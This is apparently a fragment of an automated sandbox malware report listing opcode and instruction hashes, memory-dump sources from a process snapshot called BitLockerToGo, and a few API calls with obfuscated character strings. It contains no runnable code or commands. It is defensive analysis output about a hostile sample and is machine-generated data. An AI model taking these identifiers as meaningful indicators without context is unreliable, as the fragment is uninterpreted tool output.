                                    • Opcode ID: eb45b1ee87a413ac6080f351ae42576be2cf282c931bab473a5797136574e79c
                                    • Instruction ID: e9629ac3a71e07a915240b93932fbf74544ca03519113db85ba2d8456e508539
                                    • Opcode Fuzzy Hash: eb45b1ee87a413ac6080f351ae42576be2cf282c931bab473a5797136574e79c
                                    • Instruction Fuzzy Hash: 755206326183118BC725DF18D88867BB3E2FFC4319F198A2EE9D697385D735A811CB46
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf4362c42e2a8a1f7f7c51037d284403c65af91da4638aa2edbf14d444168924
                                    • Instruction ID: e67c0aa8668b0b549ac493507fc96b833da393c0b0d91be637bd83e66a9e9519
                                    • Opcode Fuzzy Hash: bf4362c42e2a8a1f7f7c51037d284403c65af91da4638aa2edbf14d444168924
                                    • Instruction Fuzzy Hash: 3252CF315083458BC715CF68C0946FAFBE2FF88318F198A6DE89A5B351D739D989CB81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5347647a2f851975e613a19899daa847fc6aeb89ccd82321b26b36644f3a4d10
                                    • Instruction ID: f46c6870433fdcb74bb02e47c8996a964988723bbfae365ab2919ff5278c6897
                                    • Opcode Fuzzy Hash: 5347647a2f851975e613a19899daa847fc6aeb89ccd82321b26b36644f3a4d10
                                    • Instruction Fuzzy Hash: 0152B7B0A087848FE735CB24C4A87B7BBE5EF4131CF14482DC5E697A82E379A585C751
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 47ee111ab2be5fa09e33cef15ca0da4652cdbc9b45586dcf14809064ef2327aa
                                    • Instruction ID: 3e3415e20d5f22f4d3f556ad9efb828cf6e732bcf12321890afdda34da9001b8
                                    • Opcode Fuzzy Hash: 47ee111ab2be5fa09e33cef15ca0da4652cdbc9b45586dcf14809064ef2327aa
                                    • Instruction Fuzzy Hash: 9F7208B0508B818ED332CB3C8848797BFE5AB5A324F184A9DD4FA873D2D7756105CB66
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1e061976759a86bb8c55830fea7a625eeff16bdc744e4fad638a1aa13145d7eb
                                    • Instruction ID: 12d97e9fd5c1c52cb8753b8674f29170a04ed4f8be2c31dfed5addfb9de29bbd
                                    • Opcode Fuzzy Hash: 1e061976759a86bb8c55830fea7a625eeff16bdc744e4fad638a1aa13145d7eb
                                    • Instruction Fuzzy Hash: CC12DB75A18311CFD705DF68E5A0A2EB7F5FF8A315F9A886DE58693241C330E820CB91
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7690302336d065bac64d523cf9a188aa12d9fce53cd6965698969d9930e4e552
                                    • Instruction ID: f237d813268d330f2757e5a27d228b8abc67eacb23b4934a4b83d0052823bcca
                                    • Opcode Fuzzy Hash: 7690302336d065bac64d523cf9a188aa12d9fce53cd6965698969d9930e4e552
                                    • Instruction Fuzzy Hash: A5321270514B118FC368CF29C69866ABBF2BF45610B944E2ED6A787F90D776F848CB10
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2299b3a54d7ed6c3ebe18faa7c00f1f5afe3a86803533dc0193f8a1526881d19
                                    • Instruction ID: a940304f6f4275964dcb3a226c121ab6380fb3203b920ef0058b1d5ffec07924
                                    • Opcode Fuzzy Hash: 2299b3a54d7ed6c3ebe18faa7c00f1f5afe3a86803533dc0193f8a1526881d19
                                    • Instruction Fuzzy Hash: A902D1B4904741CFC724DF29D581A26BBF6EF4A300F18896DD58A8B742D335E856CFA1
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d99fd0458330eb7b110eeab6ae59ce8dee289f2d36629a21d83a5055c70d52de
                                    • Instruction ID: 79682f85984118bf136a2df9574385e3c97f5c96cc57578ebed2522ac407bf7d
                                    • Opcode Fuzzy Hash: d99fd0458330eb7b110eeab6ae59ce8dee289f2d36629a21d83a5055c70d52de
                                    • Instruction Fuzzy Hash: B1F10E32A1C342CFC316CF28D49056AF7E2BB89315F5A8AADE4918B391D335D961CB91
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11e6fdcc7b00b20d8216a174cf6fc7849cdc10e6928a692e4ce67fe3e5b518ca
                                    • Instruction ID: 0a2c5c16a8a909506c1eb317b9b37ad7ee468c09d578849f64a8ce927a762d4f
                                    • Opcode Fuzzy Hash: 11e6fdcc7b00b20d8216a174cf6fc7849cdc10e6928a692e4ce67fe3e5b518ca
                                    • Instruction Fuzzy Hash: 08E166712083828FC721DF29C884B2BBBE5EF98204F448C2DE4D997751E775E949CB96
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 953e39e9942c127ad3b1bc2d200501e10ec816ab65a068e5c3fcddadfa12f7c1
                                    • Instruction ID: 8816101a4d978b1dc184bb0ac9841299d6cc206188e55333f6eeb0d8ac171312
                                    • Opcode Fuzzy Hash: 953e39e9942c127ad3b1bc2d200501e10ec816ab65a068e5c3fcddadfa12f7c1
                                    • Instruction Fuzzy Hash: F1B1B2B2A083409BE714DE28DC6476FB7EABFC5318F18492DE99597341EB35D8048BD2
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1094975bb77c803561768cca7d542676843f009cfb4ebebd1cab451f65a95ebe
                                    • Instruction ID: 5317f4da8a8262b94cd23e6a9b92e24fcd016b0291048f152be2df3687893ce7
                                    • Opcode Fuzzy Hash: 1094975bb77c803561768cca7d542676843f009cfb4ebebd1cab451f65a95ebe
                                    • Instruction Fuzzy Hash: 68D16775A1C202CFE748CF24D5987AB77E1FB88359F09896CE44987281D339DAA5CF81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c02fd4a38926dbcb4b0ceec7ec9ea1590bf660235cca33249412fb3361abfc8a
                                    • Instruction ID: 4a18cb0ac009e9e556d521c09eb4393b82bd297e1469de1ed7e16025ba6a4869
                                    • Opcode Fuzzy Hash: c02fd4a38926dbcb4b0ceec7ec9ea1590bf660235cca33249412fb3361abfc8a
                                    • Instruction Fuzzy Hash: 6CB12071A14B00CFD3298F25D954A27BBF6FF89315F558E2DE89687A80E730F8158B50
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc5fca0449cee6d19ae76820349cd0178065518c0b1982f9f17723b1ffdbac80
                                    • Instruction ID: bf747972201c1f69a9a18b970ea14a81a8aafeb6d798b64d92cc5cfb59b301ab
                                    • Opcode Fuzzy Hash: dc5fca0449cee6d19ae76820349cd0178065518c0b1982f9f17723b1ffdbac80
                                    • Instruction Fuzzy Hash: 4A917A7560C351CFD705DF28E5A092AF7E6FF8A315F9A886DE58583252C331E860CB92
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7a12056f83b8171b6daa59fa251096f9802d16b7fc11e56c411bc55a8ab65b0
                                    • Instruction ID: fe22c7c2cb9cdd040780117694c782736e0245f9e91e80c697f4fb8e403d1055
                                    • Opcode Fuzzy Hash: d7a12056f83b8171b6daa59fa251096f9802d16b7fc11e56c411bc55a8ab65b0
                                    • Instruction Fuzzy Hash: B391897160C240CFD705DF28D5A0A2AFBE6FF9A315F59892DE5C587251D731E820CB92
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0746e4b4c59deb68c9f701c36701068ac3a354a17e8d1cce2230d6979a1a6fd0
                                    • Instruction ID: 18005187d8a5a71caca57ca97e9162138e82f3762d9df25b7d52a51d0c90c1b3
                                    • Opcode Fuzzy Hash: 0746e4b4c59deb68c9f701c36701068ac3a354a17e8d1cce2230d6979a1a6fd0
                                    • Instruction Fuzzy Hash: 6AC15FB2A087418FC360CF69DC99BABB7E1BF85318F08492DD1D9D6242E778A155CB05
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9e841b905505a5397f962d8d687115132362a2fe8d4ecd67eedeb89824a52f76
                                    • Instruction ID: 4b6718abdc4c6003cbe30272789e972e04b419acd97ff4cdfc32541ce860e239
                                    • Opcode Fuzzy Hash: 9e841b905505a5397f962d8d687115132362a2fe8d4ecd67eedeb89824a52f76
                                    • Instruction Fuzzy Hash: 2BA1677951D380ABD3009FA4E995A2FFBEAEF86745F04882DF48883261D775C8549B13
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e567691133e713b1f78a7ba51e7cd03296553f88631dfc760ff8c47878a6cdbf
                                    • Instruction ID: 9c5480eaf10b7b20d78e7ca529bb9ec878dc71428659787a0559326a672abe3a
                                    • Opcode Fuzzy Hash: e567691133e713b1f78a7ba51e7cd03296553f88631dfc760ff8c47878a6cdbf
                                    • Instruction Fuzzy Hash: 85A10731E48295CFDB05CF78D8A076DBBB2BF4A324F1886A8E495673C1D371A954CB50
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f1fcfc9acbc01e619108c59f76206bfc94635b0b58a09992e6450382a679fc17
                                    • Instruction ID: da1102c55772103c59635f14b425e6a414af4b299eba720faf6bf00d015e7cbc
                                    • Opcode Fuzzy Hash: f1fcfc9acbc01e619108c59f76206bfc94635b0b58a09992e6450382a679fc17
                                    • Instruction Fuzzy Hash: 0A81CC31A5C341CFC349DF28E9A062AB7E2FF8A315F89886DE585C7241D735D924CB81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cdcc0fb5cbd91ceb6765398bd4ae9cf88231e27c8ec20e65d9f73f81bcf8d298
                                    • Instruction ID: a9321d199f9bbb2e716e034ffe15a296e7cf8852c295a5f9b69c81cd74603ee6
                                    • Opcode Fuzzy Hash: cdcc0fb5cbd91ceb6765398bd4ae9cf88231e27c8ec20e65d9f73f81bcf8d298
                                    • Instruction Fuzzy Hash: 6C61A176B046054FDB0CCE69D8A06BDB6A3BBC9220B6CC13DD917DB389DB309812C754
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9869e21269512c87226f0218ae91bb19ef26592dab5de4c416b6cbfb42a5a5fc
                                    • Instruction ID: 102b7de87c4d8875e5501b4883d5f19668d2e984df380a0af547d30238541861
                                    • Opcode Fuzzy Hash: 9869e21269512c87226f0218ae91bb19ef26592dab5de4c416b6cbfb42a5a5fc
                                    • Instruction Fuzzy Hash: C6613837F596D14BCB24883C4C512B9AA572FE7234B2E877ED9B59B3D1C6268C12C390
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de43f87032d4e62421f21c3cdd257181cf96d345f97c96525ac34a46163c0935
                                    • Instruction ID: 2fdcd5c1c7d6d842c8c0a0d553de8fba53c4ad437e437cb706878ab7a442c489
                                    • Opcode Fuzzy Hash: de43f87032d4e62421f21c3cdd257181cf96d345f97c96525ac34a46163c0935
                                    • Instruction Fuzzy Hash: 54514AB16087548FE714DF29D49435BBBE5BBC8318F144A2EE4E987750E379D6088F82
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 769a4747b88997b15acd9e35353ae620270efa84f2c3370df4983f6ac13fa657
                                    • Instruction ID: 63a164ddcaedda3986b51f315547e1aaa2b3d0e36e11aaa29b06542e5600fcdb
                                    • Opcode Fuzzy Hash: 769a4747b88997b15acd9e35353ae620270efa84f2c3370df4983f6ac13fa657
                                    • Instruction Fuzzy Hash: 5051F3B0A043019FC714DF18C49893AB7E6FF89324F564A6DE8959B391D731EC41CB92
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9b5fca1b2c9986d08d84549053c9a6905f7801457795e11fac5fc6eaf1206079
                                    • Instruction ID: 5f4a17faa999b7ccf86b9557a9bf5ad2efada0d6280aa9857db1a55be8231292
                                    • Opcode Fuzzy Hash: 9b5fca1b2c9986d08d84549053c9a6905f7801457795e11fac5fc6eaf1206079
                                    • Instruction Fuzzy Hash: EC41F672B083650FD358CE3A889016ABBD2ABC5210F19C63DF4E9C73D5D674C906D751
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 244975f660d19ef1c80ed225602693b96feccd8699626c2671bd857335dab75f
                                    • Instruction ID: 6b85629e53aca56899ad727a1c93aea287ae24524a9d53780128123bb1b412f9
                                    • Opcode Fuzzy Hash: 244975f660d19ef1c80ed225602693b96feccd8699626c2671bd857335dab75f
                                    • Instruction Fuzzy Hash: CA313B32A197344BD7155D3D48A036FBB926BC5778F1A8B2DEAB14B3D1DA71484183C1
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 413d20d18377a2120c5e71d4ee27e2804c05c09da1b30cb940a0b4ad86aeb161
                                    • Instruction ID: 573ef18965ffd04eeca7b1cc9caa5b09a2cb7bfd01212dc186f7c04095d69671
                                    • Opcode Fuzzy Hash: 413d20d18377a2120c5e71d4ee27e2804c05c09da1b30cb940a0b4ad86aeb161
                                    • Instruction Fuzzy Hash: A831B3715002059BCB10AF14D892B7673F4FF45368F8E8569E88A8B291E735E958C7D2
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a289223212ffb30cbe73d40af1a21cdb7179ba7169488fe1948c26adee033a52
                                    • Instruction ID: c95baf2b922c06e1e2a81ec7d93da2d71e7920b03c1213557c7fafe389bca9a7
                                    • Opcode Fuzzy Hash: a289223212ffb30cbe73d40af1a21cdb7179ba7169488fe1948c26adee033a52
                                    • Instruction Fuzzy Hash: 0131EA346082029BD7249EB8D888B3EB7E5EFC4318F18997DE89997351D335D852CF42
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 935939411700ce2fd7722a19e2cae87b4e25c9583b40d9d329fb975b9c95e839
                                    • Instruction ID: 17f222bf2c683818303d3ef2f89ea781ffa1ed418197584afc3573329eca8983
                                    • Opcode Fuzzy Hash: 935939411700ce2fd7722a19e2cae87b4e25c9583b40d9d329fb975b9c95e839
                                    • Instruction Fuzzy Hash: 4B112973F542610BE718CDA198E457A7396EBC522970A043DCE43D7281CE70E410E2B0
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                    • Instruction ID: 9127c7daabea34a601fc350728e311426f712740cfa865f8d077867300197ba9
                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                    • Instruction Fuzzy Hash: 9A110233A091D44EC712CD3C94506B5BFE30AA353CB5D8399E4F89B2D2D6268D8A9361
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 73a99e04415cdefda11458bc58355c624994254988361fd94656ac7bda975dc8
                                    • Instruction ID: bf3630ce13419371ab2248be97c8e328ae1c4b029cbfc3331eb56e12a359ff0b
                                    • Opcode Fuzzy Hash: 73a99e04415cdefda11458bc58355c624994254988361fd94656ac7bda975dc8
                                    • Instruction Fuzzy Hash: 090171F160034147DF20DE5994C4B3BB3ED6F85728F18442CD86967701EBB6E805CAA2
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9d022fc1e32f718599f9685a4a75f6feb9f5bf7a4cee163e6351e2d400dcbc1b
                                    • Instruction ID: 0542d0bec1c8c615d09372d787d939364a1288fcf753f361bb859e054fd1fab9
                                    • Opcode Fuzzy Hash: 9d022fc1e32f718599f9685a4a75f6feb9f5bf7a4cee163e6351e2d400dcbc1b
                                    • Instruction Fuzzy Hash: 68015EB060D340ABD3119B518944A6FBBE6AFCAB14F044E4CE49957281D734ED14DBAB
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 196e9539fda79a4e9299b96aa320f731c1df2d8641bd4f42ed7f5a5b71ee7bab
                                    • Instruction ID: d527cfafbddc217c7773e9fdafed5bd76bd79874ede385b5511f512953f36de4
                                    • Opcode Fuzzy Hash: 196e9539fda79a4e9299b96aa320f731c1df2d8641bd4f42ed7f5a5b71ee7bab
                                    • Instruction Fuzzy Hash: 63015B70A0D340ABD311AF528544A7EBBE6ABCAB14F045E4CE09967281C734E814DB9B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d1f02cf833e13e7e77a07f104192301b5c7d2cf028f1d5345113c9a669c21073
                                    • Instruction ID: dc6cb9bdcc39ca895038f00e874f4e5dcae9f8d135fe44d15ab58c1cc13d3fc3
                                    • Opcode Fuzzy Hash: d1f02cf833e13e7e77a07f104192301b5c7d2cf028f1d5345113c9a669c21073
                                    • Instruction Fuzzy Hash: DDF02BB2A04210ABDB32C9949CD0F77FB9DCBCB36CF191465E88597202E2619845C3E6
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                                    • Instruction ID: 0c428050bfc4df77f700fc00597e83764ed5d187daca8f983c60903add1812c9
                                    • Opcode Fuzzy Hash: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                                    • Instruction Fuzzy Hash: C6E0C27AB5572106AB68CE2698116B7F3E5EAC6712F5CA52EE446D3208D338C44082A4
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocString
                                    • String ID: $$+$0$1$5$8$;$<$=$=$A$B$B$F$H$J$Q$R$S$S$X$_$e$i$k$l$m$s$s
                                    • API String ID: 2525500382-293042166
                                    • Opcode ID: bdacc7e7136e9c6c01269a7b694ba4acf2a6ea86a45fcb6ad5a4c0c19ab4cc22
                                    • Instruction ID: f4a7fa9eaa033e6265d97e8aaf735f89b6bcad5f355beb66e1b0422a40c5b6ec
                                    • Opcode Fuzzy Hash: bdacc7e7136e9c6c01269a7b694ba4acf2a6ea86a45fcb6ad5a4c0c19ab4cc22
                                    • Instruction Fuzzy Hash: 1AA1A17010C7C28AD336DA2C94487DFBEE16BA7324F084A9DE5E94A2E2D3B54145CB67
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocString
                                    • String ID: $$0$0$4$:$;$=$?$?$P$Z$t$u$y$}$~
                                    • API String ID: 2525500382-3551422112
                                    • Opcode ID: e04b37832ac324fc39e95cb067c4f62531e702989269d86a116eb7655fe79ecb
                                    • Instruction ID: 2eaf429121d65d473ab9ad17dd9b0dba30fd9c233570c1a3de3ed624a3663a3e
                                    • Opcode Fuzzy Hash: e04b37832ac324fc39e95cb067c4f62531e702989269d86a116eb7655fe79ecb
                                    • Instruction Fuzzy Hash: 1C81B260408BC28EDB22CF3C8488715BF916B26224F488BCDD8E94F7EBC365D555C766
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: !$#$%$'$)$+$-$/$9$=$?
                                    • API String ID: 2610073882-2683649463
                                    • Opcode ID: 80b027a344f2c28f15dc114097d2427eebc5a2a5fbfb6537ff6fb2ac6041965b
                                    • Instruction ID: 6648c0b086415f14ca3e1a3422f5e4fc14dcacab791500206e961780fa51975c
                                    • Opcode Fuzzy Hash: 80b027a344f2c28f15dc114097d2427eebc5a2a5fbfb6537ff6fb2ac6041965b
                                    • Instruction Fuzzy Hash: C851B17050C7C18ED332DB38945979BBFE5ABA6324F080A9DE0E94B392C7758549CB63
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: 2$C$J$K$M$Q$U$X$[$[$n
                                    • API String ID: 2610073882-1972926546
                                    • Opcode ID: d1dbd9c61a9821e7e582cb2eddaf3c48000e544b93e4aa031ca08a8ab2d3d2bc
